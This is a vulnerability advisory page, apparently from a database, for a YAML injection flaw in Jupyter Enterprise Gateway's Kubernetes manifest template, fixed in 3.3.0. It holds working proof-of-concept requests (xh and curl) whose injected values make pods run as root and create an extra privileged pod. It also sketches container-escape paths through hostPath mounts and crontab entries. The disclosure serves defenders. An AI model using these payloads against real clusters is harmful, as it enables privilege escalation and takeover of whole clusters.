PYSEC-2026-362

Vulnerability from pysec - Published: 2026-06-29 11:50 - Updated: 2026-07-01 20:22
VLAI
Details

Summary

The environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like securityContext and inject multi-document YAML to create additional unintended Kubernetes resources.

Details

The server interpolates untrusted environment variables (e.g., KERNEL_XXX) into Kubernetes manifests without YAML-aware escaping, enabling YAML injection attacks. Attackers can inject new fields, overwrite critical fields (e.g., duplicate securityContext keys, where the last one prevails), and inject document boundaries (--- for new documents, ... for end-of-document) to generate multiple resources, potentially creating arbitrary kinds like privileged pods.

The Jinja2 template for the Kubernetes manifest contains several kernel_xxx variables, such as kernel_working_dir that are used when rendering the manifest and are all vectors for YAML injection. https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77

These values come from the environment passed in the API call, where they were KERNEL_XXX before being converted to lowercase.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py#L130-L137

PoC

These proof of concepts are injecting in the KERNEL_WORKING_DIR env var, but any of the env vars could have been used. By default, the KERNEL_WORKING_DIR will be ignored unless EG_MIRROR_WORKING_DIRS is truthy for the enterprise-gateway. This is controlled by the mirrorWorkingDirs value in the Helm chart.

Using ducaale/xh:

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit.yaml

env-working-dir-exploit.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
}

Resulting request:

POST /api/kernels HTTP/1.1
Accept: application/json, */*;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Content-Length: 233
Content-Type: application/json
Host: localhost:31529
User-Agent: xh/0.24.0

{
    "env": {
        "KERNEL_POD_NAME": "working-dir-root",
        "KERNEL_NAMESPACE": "notebooks",
        "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
    }
 }

Curl equivalent command:

curl http://localhost:31529/api/kernels -H 'content-type: application/json' -H 'accept: application/json, */*;q=0.5' -d '{"env":{"KERNEL_POD_NAME":"working-dir-root","KERNEL_NAMESPACE":"notebooks","KERNEL_WORKING_DIR":"\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""}}'

The rendered Jinja2 template:

# This file defines the Kubernetes objects necessary for kernels to run witihin Kubernetes.
# Substitution parameters are processed by the launch_kubernetes.py code located in the
# same directory.  Some values are factory values, while others (typically prefixed with 'kernel_') can be
# provided by the client.
#
# This file can be customized as needed.  No changes are required to launch_kubernetes.py provided kernel_
# values are used - which be automatically set from corresponding KERNEL_ env values.  Updates will be required
# to launch_kubernetes.py if new document sections (i.e., new k8s 'kind' objects) are introduced.
#
apiVersion: v1
kind: Pod
metadata:
  name: "working-dir-root"
  namespace: "notebooks"
  labels:
    kernel_id: "186f4ecf-bf90-40b8-b210-a0987bfce927"
    app: enterprise-gateway
    component: kernel
    source: kernel-pod.yaml
  annotations:
    cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
spec:
  restartPolicy: Never
  serviceAccountName: "default"
# NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
# WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
 # will result in the new kernel pod's effective group of 0 (root)! although the user will
# correspond to the runAsUser value.  As a result, BOTH should be uncommented AND the feature-gate
# should be enabled to ensure expected behavior.  In addition, 'fsGroup: 100' is recommended so
# that /home/jovyan can be written to via the 'users' group (gid: 100) irrespective of the
# "kernel_uid" and "kernel_gid" values.
  securityContext:
    runAsUser: 1000
    runAsGroup: 100
    fsGroup: 100
  containers:
  - image: "elyra/kernel-py:3.2.3"
    name: "working-dir-root"
    env:
# Add any custom envs here that aren't already configured for the kernel's environment
#    - name: MY_CUSTOM_ENV
#      value: "my_custom_value"
    workingDir: "/tmp"

# INJECTION
  securityContext:
    runAsUser: 0
    runAsGroup: 0
    fsGroup: 100
# HAHA - stray quote "
    volumeMounts:
 # Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

Normally the container would run as uid=1000(jovyan) gid=100(users) groups=100(users). This injects a pod securityContext with runAsUser: 0 and runAsGroup: 0 (and fsGroup: 100). The processing of the YAML results in the duplicate key clobbering the original. Making the container run as uid=0(root) gid=0(root) groups=0(root),100(users).

In addition to injecting a pod level securityContext it is also possible to inject a container level securityContext which supports the privileged field.

Injecting a Pod

By injecting ... and --- it is possible to use multi-document YAML to inject Kubernetes resources.

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit-pod.yaml

env-working-dir-exploit-pod.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root-pod",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\ \n...\\n---\\napiVersion: v1\\nkind: Pod\\nmetadata:\\n  name: injected-pod\\n\\\n  spec:\\n  containers:\\n    - name: injected-container\\n      image: nginx\\n      ports:\\n        - containerPort: 80\\n      securityContext:\\n        privileged: true\\n        runAsUser: 0\\n        runAsGroup: 0\ \n...\\n# HAHA - stray quote\""
}

This is rendered as (skipping the beginning of the rendering before the inject):

    workingDir: "/tmp"

# INJECTION
...
---
apiVersion: v1
kind: Pod
metadata:
  name: injected-pod
spec:
  containers:
    - name: injected-container
      image: nginx
      ports:
        - containerPort: 80
      securityContext:
        privileged: true
        runAsUser: 0
        runAsGroup: 0
...
# HAHA - stray quote"
    volumeMounts:
# Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

kubectl get pods -n notebooks

NAME                   READY   STATUS    RESTARTS   AGE
injected-pod           1/1     Running   0          4s
working-dir-root-pod   1/1     Running   0          4s

The injected-pod has been created in addition to the working-dir-root-pod.

kubectl get pod/injected-pod -o yaml -n notebooks -o jsonpath='{.spec.containers[*].securityContext}':

{
  "privileged": true,
  "runAsGroup": 0,
  "runAsUser": 0
}

### Impact

An attacker can create pods running with arbitrary, image, securityContext, and volumeMounts including hostPath mounts. Privileged pods can be created.

Arbitrary Kubernetes resources of kinds: Pod, Secret, PersistentVolumeClaim, PersistentVolume, Service, and ConfigMap can be created.

Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. Multiple container escape vectors exist. It is possible to create privileged pods which could load kernel modules to compromise the host. It is also possible to specify volume mounts, so another vector for a container escape is to use a hostPath R/W volume mount, use the injected securityContext to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Impacted products
Name purl
jupyter-enterprise-gateway pkg:pypi/jupyter-enterprise-gateway

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "jupyter-enterprise-gateway",
        "purl": "pkg:pypi/jupyter-enterprise-gateway"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.5.0.dev0",
        "0.5.0.dev1",
        "0.5.0.dev2",
        "0.6.0",
        "0.7.0",
        "0.8.0",
        "0.9.0",
        "0.9.1",
        "0.9.2",
        "0.9.3",
        "0.9.4",
        "1.0.0",
        "1.0.1",
        "1.0.2",
        "1.1.0",
        "1.1.1",
        "1.2.0",
        "2.0.0",
        "2.0.0b1",
        "2.0.0rc1",
        "2.0.0rc2",
        "2.1.0",
        "2.1.1",
        "2.2.0",
        "2.2.0rc1",
        "2.2.0rc2",
        "2.3.0",
        "2.4.0",
        "2.5.0",
        "2.5.1",
        "2.5.2",
        "2.6.0",
        "3.0.0",
        "3.0.0b0",
        "3.0.0rc0",
        "3.0.0rc1",
        "3.1.0",
        "3.2.0",
        "3.2.1",
        "3.2.2",
        "3.2.3"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44182",
    "GHSA-cfw7-6c5v-2wjq"
  ],
  "details": "### Summary\n\nThe environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like `securityContext` and inject multi-document YAML to create additional unintended Kubernetes resources.\n\n### Details\n\nThe server interpolates untrusted environment variables (e.g., `KERNEL_XXX`) into Kubernetes manifests without YAML-aware escaping, enabling YAML injection attacks. Attackers can inject new fields, overwrite critical fields (e.g., duplicate `securityContext` keys, where the last one prevails), and inject document boundaries (`---` for new documents, `...` for end-of-document) to generate multiple resources, potentially creating arbitrary kinds like privileged pods.\n\nThe Jinja2 template for the Kubernetes manifest contains several `kernel_xxx` variables, such as `kernel_working_dir` that are used when rendering the manifest and are all vectors for YAML injection.\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77\n \nThese values come from the environment passed in the API call, where they were `KERNEL_XXX` before being converted to lowercase.\n\nhttps://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py#L130-L137\n \n### PoC\n\nThese proof of concepts are injecting in the `KERNEL_WORKING_DIR` env var, but any of the env vars could have been used.\nBy default, the `KERNEL_WORKING_DIR` will be ignored unless `EG_MIRROR_WORKING_DIRS` is truthy for the `enterprise-gateway`. This is controlled by the `mirrorWorkingDirs` value in the Helm chart.\n\nUsing `ducaale/xh`:\n\n```bash\nxh http://localhost:31529/api/kernels env:=@env-working-dir-exploit.yaml\n```\n\n`env-working-dir-exploit.yaml`:\n\n```json\n{\n  \"KERNEL_POD_NAME\": \"working-dir-root\",\n  \"KERNEL_NAMESPACE\": \"notebooks\",\n  \"KERNEL_WORKING_DIR\": \"\\\"/tmp\\\\\\\"\\\\n\\\\n# INJECTION\\\\n  securityContext:\\\\n    runAsUser: 0\\\\n    runAsGroup: 0\\\\n    fsGroup: 100\\\\n# HAHA - stray quote \\\"\"\n}\n \n```\n\nResulting request:\n\n```\nPOST /api/kernels HTTP/1.1\nAccept: application/json, */*;q=0.5\nAccept-Encoding: gzip, deflate, br, zstd\nConnection: keep-alive\nContent-Length: 233\nContent-Type: application/json\nHost: localhost:31529\nUser-Agent: xh/0.24.0\n\n{\n    \"env\": {\n        \"KERNEL_POD_NAME\": \"working-dir-root\",\n        \"KERNEL_NAMESPACE\": \"notebooks\",\n        \"KERNEL_WORKING_DIR\": \"\\\"/tmp\\\\\\\"\\\\n\\\\n# INJECTION\\\\n  securityContext:\\\\n    runAsUser: 0\\\\n    runAsGroup: 0\\\\n    fsGroup: 100\\\\n# HAHA - stray quote \\\"\"\n    }\n }\n```\n\nCurl equivalent command:\n\n```bash\ncurl http://localhost:31529/api/kernels -H \u0027content-type: application/json\u0027 -H \u0027accept: application/json, */*;q=0.5\u0027 -d \u0027{\"env\":{\"KERNEL_POD_NAME\":\"working-dir-root\",\"KERNEL_NAMESPACE\":\"notebooks\",\"KERNEL_WORKING_DIR\":\"\\\"/tmp\\\\\\\"\\\\n\\\\n# INJECTION\\\\n  securityContext:\\\\n    runAsUser: 0\\\\n    runAsGroup: 0\\\\n    fsGroup: 100\\\\n# HAHA - stray quote \\\"\"}}\u0027\n```\n\nThe rendered Jinja2 template:\n\n```yaml\n# This file defines the Kubernetes objects necessary for kernels to run witihin Kubernetes.\n# Substitution parameters are processed by the launch_kubernetes.py code located in the\n# same directory.  Some values are factory values, while others (typically prefixed with \u0027kernel_\u0027) can be\n# provided by the client.\n#\n# This file can be customized as needed.  No changes are required to launch_kubernetes.py provided kernel_\n# values are used - which be automatically set from corresponding KERNEL_ env values.  Updates will be required\n# to launch_kubernetes.py if new document sections (i.e., new k8s \u0027kind\u0027 objects) are introduced.\n#\napiVersion: v1\nkind: Pod\nmetadata:\n  name: \"working-dir-root\"\n  namespace: \"notebooks\"\n  labels:\n    kernel_id: \"186f4ecf-bf90-40b8-b210-a0987bfce927\"\n    app: enterprise-gateway\n    component: kernel\n    source: kernel-pod.yaml\n  annotations:\n    cluster-autoscaler.kubernetes.io/safe-to-evict: \"false\"\nspec:\n  restartPolicy: Never\n  serviceAccountName: \"default\"\n# NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.\n# WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate\n # will result in the new kernel pod\u0027s effective group of 0 (root)! although the user will\n# correspond to the runAsUser value.  As a result, BOTH should be uncommented AND the feature-gate\n# should be enabled to ensure expected behavior.  In addition, \u0027fsGroup: 100\u0027 is recommended so\n# that /home/jovyan can be written to via the \u0027users\u0027 group (gid: 100) irrespective of the\n# \"kernel_uid\" and \"kernel_gid\" values.\n  securityContext:\n    runAsUser: 1000\n    runAsGroup: 100\n    fsGroup: 100\n  containers:\n  - image: \"elyra/kernel-py:3.2.3\"\n    name: \"working-dir-root\"\n    env:\n# Add any custom envs here that aren\u0027t already configured for the kernel\u0027s environment\n#    - name: MY_CUSTOM_ENV\n#      value: \"my_custom_value\"\n    workingDir: \"/tmp\"\n\n# INJECTION\n  securityContext:\n    runAsUser: 0\n    runAsGroup: 0\n    fsGroup: 100\n# HAHA - stray quote \"\n    volumeMounts:\n # Define any \"unconditional\" mounts here, followed by \"conditional\" mounts that vary per client\n  volumes:\n# Define any \"unconditional\" volumes here, followed by \"conditional\" volumes that vary per client\n```\n\nNormally the container would run as `uid=1000(jovyan) gid=100(users) groups=100(users)`.\nThis injects a pod `securityContext` with `runAsUser: 0` and `runAsGroup: 0` (and `fsGroup: 100`).\n The processing of the YAML results in the duplicate key clobbering the original.\n Making the container run as `uid=0(root) gid=0(root) groups=0(root),100(users)`.\n \nIn addition to injecting a pod level `securityContext` it is also possible to inject a container level `securityContext` which supports the `privileged` field.\n \n\n#### Injecting a Pod\n\nBy injecting `...` and `---` it is possible to use multi-document YAML to inject Kubernetes resources.\n\n```bash\nxh http://localhost:31529/api/kernels env:=@env-working-dir-exploit-pod.yaml\n```\n\n`env-working-dir-exploit-pod.yaml`:\n\n```json\n{\n  \"KERNEL_POD_NAME\": \"working-dir-root-pod\",\n  \"KERNEL_NAMESPACE\": \"notebooks\",\n  \"KERNEL_WORKING_DIR\": \"\\\"/tmp\\\\\\\"\\\\n\\\\n# INJECTION\\ \\n...\\\\n---\\\\napiVersion: v1\\\\nkind: Pod\\\\nmetadata:\\\\n  name: injected-pod\\\\n\\\\\\n  spec:\\\\n  containers:\\\\n    - name: injected-container\\\\n      image: nginx\\\\n      ports:\\\\n        - containerPort: 80\\\\n      securityContext:\\\\n        privileged: true\\\\n        runAsUser: 0\\\\n        runAsGroup: 0\\ \\n...\\\\n# HAHA - stray quote\\\"\"\n}\n```\n\nThis is rendered as (skipping the beginning of the rendering before the inject):\n\n```yaml\n    workingDir: \"/tmp\"\n\n# INJECTION\n...\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: injected-pod\nspec:\n  containers:\n    - name: injected-container\n      image: nginx\n      ports:\n        - containerPort: 80\n      securityContext:\n        privileged: true\n        runAsUser: 0\n        runAsGroup: 0\n...\n# HAHA - stray quote\"\n    volumeMounts:\n# Define any \"unconditional\" mounts here, followed by \"conditional\" mounts that vary per client\n  volumes:\n# Define any \"unconditional\" volumes here, followed by \"conditional\" volumes that vary per client\n```\n\n`kubectl get pods -n notebooks`\n```\nNAME                   READY   STATUS    RESTARTS   AGE\ninjected-pod           1/1     Running   0          4s\nworking-dir-root-pod   1/1     Running   0          4s\n```\n\nThe `injected-pod` has been created in addition to the `working-dir-root-pod`.\n\n`kubectl get pod/injected-pod -o yaml -n notebooks -o jsonpath=\u0027{.spec.containers[*].securityContext}\u0027`:\n\n```json\n{\n  \"privileged\": true,\n  \"runAsGroup\": 0,\n  \"runAsUser\": 0\n}\n```\n\n ### Impact\n\nAn attacker can create pods running with arbitrary, `image`, `securityContext`, and `volumeMounts` including `hostPath` mounts. Privileged pods can be created.\n \nArbitrary Kubernetes resources of kinds: `Pod`, `Secret`, `PersistentVolumeClaim`, `PersistentVolume`, `Service`, and `ConfigMap` can be created.\n\nRepeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. Multiple container escape vectors exist. It is possible to create privileged pods which could load kernel modules to compromise the host. It is also possible to specify volume mounts, so another vector for a container escape is to use a `hostPath` R/W volume mount, use the injected `securityContext` to run as `root`, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.",
  "id": "PYSEC-2026-362",
  "modified": "2026-07-01T20:22:54.803627Z",
  "published": "2026-06-29T11:50:52.747336Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-cfw7-6c5v-2wjq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jupyter-server/enterprise_gateway"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/jupyter-enterprise-gateway"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-cfw7-6c5v-2wjq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44182"
    }
  ],
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Jupyter Enterprise Gateway: Kubernetes Manifest Injection in Jinja2 Template Rendering"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…